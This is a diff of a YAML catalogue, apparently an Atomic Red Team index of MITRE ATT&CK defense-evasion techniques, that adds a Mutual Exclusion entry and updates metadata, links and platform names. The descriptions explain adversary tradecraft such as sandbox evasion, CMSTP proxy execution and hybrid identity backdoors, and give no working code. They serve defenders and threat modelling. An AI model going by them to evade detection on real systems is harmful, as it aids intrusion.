       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -5430,57 +5582,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -5495,6 +5600,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -5504,9 +5615,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -5516,8 +5632,44 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests:
     - name: Delay execution with ping
@@ -5546,7 +5698,7 @@ defense-evasion:
         name: sh
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -5592,8 +5744,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -5612,13 +5764,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -5733,7 +5884,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -5774,7 +5924,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -5813,8 +5963,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -5837,7 +5985,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -5876,12 +6024,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -5908,6 +6054,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -5925,12 +6072,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -5956,18 +6103,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -6012,13 +6158,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -6090,7 +6235,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -6123,35 +6268,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -6159,9 +6303,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -6170,21 +6314,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -6224,9 +6369,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -6289,7 +6431,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -6349,7 +6490,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -6390,7 +6530,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -6421,8 +6561,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -6512,7 +6650,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -6536,12 +6674,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -6620,7 +6757,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -6705,12 +6841,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -6729,6 +6864,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -6736,7 +6872,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -6756,29 +6891,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -6829,7 +6966,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -6896,7 +7032,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests:
     - name: Pad Binary to Change Hash - Linux/macOS dd
@@ -6968,7 +7103,7 @@ defense-evasion:
         name: sh
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -7004,6 +7139,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -7015,16 +7154,12 @@ defense-evasion:
 
 
